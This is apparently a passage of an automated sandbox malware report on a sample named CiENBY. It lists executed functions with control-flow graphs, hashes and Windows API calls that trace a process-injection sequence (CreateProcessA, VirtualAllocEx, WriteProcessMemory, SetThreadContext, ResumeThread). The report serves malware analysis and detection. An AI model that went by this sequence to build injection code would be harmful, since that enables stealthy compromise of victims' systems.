28262 717adc8 Wow64SetThreadContext 28261->28262 28264 717ae55 28262->28264 28264->28196 28266 717ae0d Wow64SetThreadContext 28265->28266 28268 717ae55 28266->28268 28268->28196 28270 717b3e0 WriteProcessMemory 28269->28270 28272 717b437 28270->28272 28272->28201 28274 717b3e0 WriteProcessMemory 28273->28274 28276 717b437 28274->28276 28276->28201 28278 717b2d8 VirtualAllocEx 28277->28278 28280 717b355 28278->28280 28280->28211 28282 717b318 VirtualAllocEx 28281->28282 28284 717b355 28282->28284 28284->28211 28286 717e970 28285->28286 28288 717adc0 Wow64SetThreadContext 28286->28288 28289 717adc8 Wow64SetThreadContext 28286->28289 28287 717e99b 28287->28230 28288->28287 28289->28287 28291 717e985 28290->28291 28293 717adc0 Wow64SetThreadContext 28291->28293 28294 717adc8 Wow64SetThreadContext 28291->28294 28292 717e99b 28292->28230 28293->28292 28294->28292 28345 717e9f8 28346 717eb83 28345->28346 28348 717ea1e 28345->28348 28348->28346 28349 7179b60 28348->28349 28350 717ec78 PostMessageW 28349->28350 28351 717ece4 28350->28351 28351->28348

                                                                                Executed Functions

                                                                                Function 0717B614 Relevance: 1.8, APIs: 1, Instructions: 252processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 612 717b614-717b6b5 615 717b6b7-717b6c1 612->615 616 717b6ee-717b70e 612->616 615->616 617 717b6c3-717b6c5 615->617 623 717b747-717b776 616->623 624 717b710-717b71a 616->624 618 717b6c7-717b6d1 617->618 619 717b6e8-717b6eb 617->619 621 717b6d5-717b6e4 618->621 622 717b6d3 618->622 619->616 621->621 625 717b6e6 621->625 622->621 630 717b7af-717b869 CreateProcessA 623->630 631 717b778-717b782 623->631 624->623 626 717b71c-717b71e 624->626 625->619 628 717b741-717b744 626->628 629 717b720-717b72a 626->629 628->623 632 717b72e-717b73d 629->632 633 717b72c 629->633 644 717b872-717b8f8 630->644 645 717b86b-717b871 630->645 631->630 635 717b784-717b786 631->635 632->632 634 717b73f 632->634 633->632 634->628 636 717b7a9-717b7ac 635->636 637 717b788-717b792 635->637 636->630 639 717b796-717b7a5 637->639 640 717b794 637->640 639->639 642 717b7a7 639->642 640->639 642->636 655 717b8fa-717b8fe 644->655 656 717b908-717b90c 644->656 645->644 655->656 657 717b900 655->657 658 717b90e-717b912 656->658 659 717b91c-717b920 656->659 657->656 658->659 660 717b914 658->660 661 717b922-717b926 659->661 662 717b930-717b934 659->662 660->659 661->662 665 717b928 661->665 663 717b946-717b94d 662->663 664 717b936-717b93c 662->664 666 717b964 663->666 667 717b94f-717b95e 663->667 664->663 665->662 669 717b965 666->669 667->666 669->669
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0717B856
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: ea00a4972ec57061cb7f46e4981dc88371544d6d1c647d16ab9e92d5f757c435
                                                                                • Instruction ID: 5a068be234dff0a7b8cdf44effa82e3252a758e38a4ee6445d4ab206feadae31
                                                                                • Opcode Fuzzy Hash: ea00a4972ec57061cb7f46e4981dc88371544d6d1c647d16ab9e92d5f757c435
                                                                                • Instruction Fuzzy Hash: 12A15BF1D0425ACFDB21DF68C841BEDBBB2BF48314F1485A9E858A7280DB749985CF91
                                                                                Function 0717B620 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 670 717b620-717b6b5 672 717b6b7-717b6c1 670->672 673 717b6ee-717b70e 670->673 672->673 674 717b6c3-717b6c5 672->674 680 717b747-717b776 673->680 681 717b710-717b71a 673->681 675 717b6c7-717b6d1 674->675 676 717b6e8-717b6eb 674->676 678 717b6d5-717b6e4 675->678 679 717b6d3 675->679 676->673 678->678 682 717b6e6 678->682 679->678 687 717b7af-717b869 CreateProcessA 680->687 688 717b778-717b782 680->688 681->680 683 717b71c-717b71e 681->683 682->676 685 717b741-717b744 683->685 686 717b720-717b72a 683->686 685->680 689 717b72e-717b73d 686->689 690 717b72c 686->690 701 717b872-717b8f8 687->701 702 717b86b-717b871 687->702 688->687 692 717b784-717b786 688->692 689->689 691 717b73f 689->691 690->689 691->685 693 717b7a9-717b7ac 692->693 694 717b788-717b792 692->694 693->687 696 717b796-717b7a5 694->696 697 717b794 694->697 696->696 699 717b7a7 696->699 697->696 699->693 712 717b8fa-717b8fe 701->712 713 717b908-717b90c 701->713 702->701 712->713 714 717b900 712->714 715 717b90e-717b912 713->715 716 717b91c-717b920 713->716 714->713 715->716 717 717b914 715->717 718 717b922-717b926 716->718 719 717b930-717b934 716->719 717->716 718->719 722 717b928 718->722 720 717b946-717b94d 719->720 721 717b936-717b93c 719->721 723 717b964 720->723 724 717b94f-717b95e 720->724 721->720 722->719 726 717b965 723->726 724->723 726->726
                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0717B856
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: c312029999f1470ad74ed20ba943007a267b53ca3be349324d99b1871359f86c
                                                                                • Instruction ID: 6fd7a63d759a30bf0bce477e4fcec3cf3895a228043dc04b0d04b4dc41e8408f
                                                                                • Opcode Fuzzy Hash: c312029999f1470ad74ed20ba943007a267b53ca3be349324d99b1871359f86c
                                                                                • Instruction Fuzzy Hash: 44915BF1D0425ACFDB21DF68C841BEDBBB2BF48314F1485A9E858A7280DB749985CF91
                                                                                Function 02C8ADC8 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 727 2c8adc8-2c8add7 728 2c8add9-2c8ade6 call 2c893f4 727->728 729 2c8ae03-2c8ae07 727->729 735 2c8ade8 728->735 736 2c8adfc 728->736 731 2c8ae09-2c8ae13 729->731 732 2c8ae1b-2c8ae5c 729->732 731->732 738 2c8ae69-2c8ae77 732->738 739 2c8ae5e-2c8ae66 732->739 783 2c8adee call 2c8b060 735->783 784 2c8adee call 2c8b051 735->784 736->729 740 2c8ae79-2c8ae7e 738->740 741 2c8ae9b-2c8ae9d 738->741 739->738 743 2c8ae89 740->743 744 2c8ae80-2c8ae87 call 2c8a130 740->744 746 2c8aea0-2c8aea7 741->746 742 2c8adf4-2c8adf6 742->736 745 2c8af38-2c8aff8 742->745 748 2c8ae8b-2c8ae99 743->748 744->748 778 2c8affa-2c8affd 745->778 779 2c8b000-2c8b02b GetModuleHandleW 745->779 749 2c8aea9-2c8aeb1 746->749 750 2c8aeb4-2c8aebb 746->750 748->746 749->750 753 2c8aec8-2c8aed1 call 2c8a140 750->753 754 2c8aebd-2c8aec5 750->754 758 2c8aede-2c8aee3 753->758 759 2c8aed3-2c8aedb 753->759 754->753 760 2c8af01-2c8af0e 758->760 761 2c8aee5-2c8aeec 758->761 759->758 768 2c8af10-2c8af2e 760->768 769 2c8af31-2c8af37 760->769 761->760 763 2c8aeee-2c8aefe call 2c8a150 call 2c8a160 761->763 763->760 768->769 778->779 780 2c8b02d-2c8b033 779->780 781 2c8b034-2c8b048 779->781 780->781 783->742 784->742
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02C8B01E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957725778.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_2c80000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: e6a34ea01777ddd9a8c4668eb3337382943c5584a6a307a765b5214a73c48897
                                                                                • Instruction ID: ca294274642f30cafaa6b9761307cf8bda56a7c9c81de62a1a39f7caf3cdce7c
                                                                                • Opcode Fuzzy Hash: e6a34ea01777ddd9a8c4668eb3337382943c5584a6a307a765b5214a73c48897
                                                                                • Instruction Fuzzy Hash: 67714870A00B458FDB24EF2AD44475ABBF1FF88308F00892ED48AD7A50D775E955CB91
                                                                                Function 02C844B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 785 2c844b4-2c859e1 CreateActCtxA 788 2c859ea-2c85a44 785->788 789 2c859e3-2c859e9 785->789 796 2c85a53-2c85a57 788->796 797 2c85a46-2c85a49 788->797 789->788 798 2c85a68-2c85a98 796->798 799 2c85a59-2c85a65 796->799 797->796 803 2c85a4a-2c85a4f 798->803 804 2c85a9a-2c85b1c 798->804 799->798 803->796
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 02C859D1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957725778.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_2c80000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 9278f75ac85b57b00e7bbfddc82dad52827fa3c4e4d765b82700311315db1c8f
                                                                                • Instruction ID: 31c1e275239261865b93defad52a55f2dd5494188fb36fd6c925c1a0ddb3dc14
                                                                                • Opcode Fuzzy Hash: 9278f75ac85b57b00e7bbfddc82dad52827fa3c4e4d765b82700311315db1c8f
                                                                                • Instruction Fuzzy Hash: FB41D4B0C0061DCBDB24DFA9C885BDDBBF5BF44314F60805AD408AB255DBB56946CF90
                                                                                Function 02C85914 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 807 2c85914-2c859e1 CreateActCtxA 809 2c859ea-2c85a44 807->809 810 2c859e3-2c859e9 807->810 817 2c85a53-2c85a57 809->817 818 2c85a46-2c85a49 809->818 810->809 819 2c85a68-2c85a98 817->819 820 2c85a59-2c85a65 817->820 818->817 824 2c85a4a-2c85a4f 819->824 825 2c85a9a-2c85b1c 819->825 820->819 824->817
                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 02C859D1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957725778.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_2c80000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: fdb8a5da09cf1736288628378180b29fffc035d9c26945c4ef96f3d10725a5af
                                                                                • Instruction ID: 8b410b92f635b249b9222fced8e4d900382b3fe5c244cb224bcd304816fe3e3c
                                                                                • Opcode Fuzzy Hash: fdb8a5da09cf1736288628378180b29fffc035d9c26945c4ef96f3d10725a5af
                                                                                • Instruction Fuzzy Hash: A74112B0C00659CFDB24DFA9C885BDDBBF5BF48308F20806AD408AB255DBB5694ACF50
                                                                                Function 0717B390 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 828 717b390-717b3e6 830 717b3f6-717b435 WriteProcessMemory 828->830 831 717b3e8-717b3f4 828->831 833 717b437-717b43d 830->833 834 717b43e-717b46e 830->834 831->830 833->834
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0717B428
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: daa35904cf94ca0d156eaeab0a31713802321924cc0e02f064ed4d5f85873078
                                                                                • Instruction ID: 5e7399d964b04bd1e6e900d23bc246045e0bc75ebfb9d4bb5b44bf08084029a5
                                                                                • Opcode Fuzzy Hash: daa35904cf94ca0d156eaeab0a31713802321924cc0e02f064ed4d5f85873078
                                                                                • Instruction Fuzzy Hash: CE215AB59003599FCF10CFA9C981BEEBBF5FF48320F108429E959A7240D7799955CBA0
                                                                                Function 02C8D698 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 838 2c8d698-2c8d69c 839 2c8d69e-2c8d6df 838->839 840 2c8d6e2-2c8d734 DuplicateHandle 838->840 839->840 842 2c8d73d-2c8d75a 840->842 843 2c8d736-2c8d73c 840->843 843->842
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C8D666,?,?,?,?,?), ref: 02C8D727
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957725778.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_2c80000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: e7ac31d99706a6c7af2523e0be30bf6ee2d69f38f0b55987eab35c38b9cc619c
                                                                                • Instruction ID: ef8f3f4325c8d81805161cf2512630ef61f2e518ab44939627ba76d0b297e5a6
                                                                                • Opcode Fuzzy Hash: e7ac31d99706a6c7af2523e0be30bf6ee2d69f38f0b55987eab35c38b9cc619c
                                                                                • Instruction Fuzzy Hash: AD2168B5800249DFDB10CFA9D884ADEFFF4EF48320F24815AE954A7250D378A941CF61
                                                                                Function 0717B480 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 856 717b480-717b484 857 717b486-717b4df 856->857 858 717b4e5-717b515 ReadProcessMemory 856->858 857->858 860 717b517-717b51d 858->860 861 717b51e-717b54e 858->861 860->861
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0717B508
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 4fc3accf9b04b2985a8ad6c5e6bc7ca2a67291c3a9ad672dbe7c6c5deac2b6e0
                                                                                • Instruction ID: 97a75f145d337d7b88f266d9c038bec135b189694b3f9b1f145d4d08edcc4fa4
                                                                                • Opcode Fuzzy Hash: 4fc3accf9b04b2985a8ad6c5e6bc7ca2a67291c3a9ad672dbe7c6c5deac2b6e0
                                                                                • Instruction Fuzzy Hash: DC213BB18003499FCB10CFAAC845AEEFBF5FF48320F54842EE559A7250D7789941DB65
                                                                                Function 0717B398 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 846 717b398-717b3e6 848 717b3f6-717b435 WriteProcessMemory 846->848 849 717b3e8-717b3f4 846->849 851 717b437-717b43d 848->851 852 717b43e-717b46e 848->852 849->848 851->852
                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0717B428
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 1f786c71c239c7330b456ccc2deaf6a2bdd0e6fdf92ff53bdd1a8fd9b56c4839
                                                                                • Instruction ID: 51ce16cc1c756d273113145e101e5b1f5114f0652823b8d0f1335f696576d082
                                                                                • Opcode Fuzzy Hash: 1f786c71c239c7330b456ccc2deaf6a2bdd0e6fdf92ff53bdd1a8fd9b56c4839
                                                                                • Instruction Fuzzy Hash: 6A2139B19003599FDF10CFAAC985BEEBBF5FF48320F148429E959A7240D7789940DBA4
                                                                                Function 0717ADC0 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 866 717adc0-717ae13 869 717ae15-717ae21 866->869 870 717ae23-717ae53 Wow64SetThreadContext 866->870 869->870 872 717ae55-717ae5b 870->872 873 717ae5c-717ae8c 870->873 872->873
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0717AE46
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 87456f0b6c290a4887dbef19efb47adeccc256879d69e5b17e871abb564112b7
                                                                                • Instruction ID: e1416625eb53bcf8acfe10344cef60788275a887880a07cceb43f18055b61ea5
                                                                                • Opcode Fuzzy Hash: 87456f0b6c290a4887dbef19efb47adeccc256879d69e5b17e871abb564112b7
                                                                                • Instruction Fuzzy Hash: FD2137B19002099FDB10DFAAC4857EEBBF4EF88320F14842AD559B7280DB789945CFA5
                                                                                Function 02C8B7B0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 877 2c8b7b0-2c8d734 DuplicateHandle 880 2c8d73d-2c8d75a 877->880 881 2c8d736-2c8d73c 877->881 881->880
                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C8D666,?,?,?,?,?), ref: 02C8D727
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957725778.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_2c80000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: 80416a492c53abee331a0684eb7bf9f20a2c9afe7a002195d7e81c34241f87f4
                                                                                • Instruction ID: 30459706aec50da518b11f9729bc8b1baccb6e0268fd50562bc063966a924ebb
                                                                                • Opcode Fuzzy Hash: 80416a492c53abee331a0684eb7bf9f20a2c9afe7a002195d7e81c34241f87f4
                                                                                • Instruction Fuzzy Hash: 772119B5900248DFDB10CFAAD484ADEBBF4EB48310F14845AE955A7350D378A940CF64
                                                                                Function 0717B488 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0717B508
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 6e6d25f1156f3c596c5faa6eb68297369900026a15dc8687dc869babdcdaad5f
                                                                                • Instruction ID: f400534ab8f6ec0988fc62524eef03b087fec51d0f5d8ddbca91c374122ebcb7
                                                                                • Opcode Fuzzy Hash: 6e6d25f1156f3c596c5faa6eb68297369900026a15dc8687dc869babdcdaad5f
                                                                                • Instruction Fuzzy Hash: 4D2139B1C003599FDB10CFAAC841AEEFBF5FF48320F508829E518A7240D7799900DBA0
                                                                                Function 0717ADC8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0717AE46
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: caec1d917b5aca04f589b4ddc36ba8c33073d5f04008722e85f495053beaf3c8
                                                                                • Instruction ID: 459fa1f50644abcf6175a90287743dd9c4e96bb75e8dc6f0b31925469a25104f
                                                                                • Opcode Fuzzy Hash: caec1d917b5aca04f589b4ddc36ba8c33073d5f04008722e85f495053beaf3c8
                                                                                • Instruction Fuzzy Hash: 842118B1D003099FDB10DFAAC4857AEBBF4EF88324F148429D559B7280DB789945CFA5
                                                                                Function 0717B2D3 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0717B346
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 41e2307b678fcbf461c59991310a16b055116ecc2b413d43eac765605cb5bf57
                                                                                • Instruction ID: 364982f0d8b4442811aa9c0e6226bed858a6705352fb146e6eb49c05cdf32e07
                                                                                • Opcode Fuzzy Hash: 41e2307b678fcbf461c59991310a16b055116ecc2b413d43eac765605cb5bf57
                                                                                • Instruction Fuzzy Hash: B1116D759002499FCF20DFAAC844AEEBFF5EF88320F148819E515A7250C7759540CFA0
                                                                                Function 0717AD10 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 95eb681b97efb3d912179c79c33dbe593e032bc9bd49e9d3a6efa0d4858013cf
                                                                                • Instruction ID: dc6d40a1c6b21e8592911f45d91e2ec463553fbe7b28a16b1903f368ec2fb49a
                                                                                • Opcode Fuzzy Hash: 95eb681b97efb3d912179c79c33dbe593e032bc9bd49e9d3a6efa0d4858013cf
                                                                                • Instruction Fuzzy Hash: 79117CB19002498FCB20CFAAC4457EEFBF8EF88320F108419D559A7640C735A940CBA5
                                                                                Function 0717B2D8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0717B346
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                • Opcode ID: 806e1f37fae57e0df863509f2e7c6574ab4a4a4bbe829cb7a1c9396197945973
                                                                                • Instruction ID: ef793a947ab5d4d351915122c9ea981b7dc355920888e635dbd7e549921fac85
                                                                                • Opcode Fuzzy Hash: 806e1f37fae57e0df863509f2e7c6574ab4a4a4bbe829cb7a1c9396197945973
                                                                                • Instruction Fuzzy Hash: C0114CB59002499FDF20DFAAC844AEFBFF5EF88320F148819E519A7250C7799540CFA0
                                                                                Function 0717AD18 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 43d74aad99e61bd1162db2dd9a3e03a5b548dd03847d4bb48b89fae87db05127
                                                                                • Instruction ID: 5696022a76a032896f4f3430910bed0f5b08cb73b872cdb4cfcbd3d4817f3d2b
                                                                                • Opcode Fuzzy Hash: 43d74aad99e61bd1162db2dd9a3e03a5b548dd03847d4bb48b89fae87db05127
                                                                                • Instruction Fuzzy Hash: 5A113AB1D007498FDB20DFAAC4457AEFBF9EF88324F148819D519A7240DB79A940CB94
                                                                                Function 0717EC70 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0717ECD5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                • Opcode ID: 86f13b9350262ba3cc4fc0a84731ae1df28a0c9d5030c8c70942ca0517eeca93
                                                                                • Instruction ID: c9943b76a4445dc6408b9a37259f8040854069bd5908af19c86c7b29e51cc3bf
                                                                                • Opcode Fuzzy Hash: 86f13b9350262ba3cc4fc0a84731ae1df28a0c9d5030c8c70942ca0517eeca93
                                                                                • Instruction Fuzzy Hash: 1F11E3B5800249DFCB10CF9AC585BDEFBF8FB48320F148859E558A7640D379A544CFA1
                                                                                Function 02C8AFB8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02C8B01E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957725778.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_2c80000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: d5ffd2a79b8ac1bb4e9b85f2425e47b72532e8808077aaf1743438ed822274ec
                                                                                • Instruction ID: ae9e4819e90566fbc3b949f4893b5bfa963cce8f105fe2511fae0523f05b4629
                                                                                • Opcode Fuzzy Hash: d5ffd2a79b8ac1bb4e9b85f2425e47b72532e8808077aaf1743438ed822274ec
                                                                                • Instruction Fuzzy Hash: 4811DFB5C006498FCB20DF9AD444A9EFBF8EF88228F14845AD969A7210D379A545CFA1
                                                                                Function 07179B60 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0717ECD5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
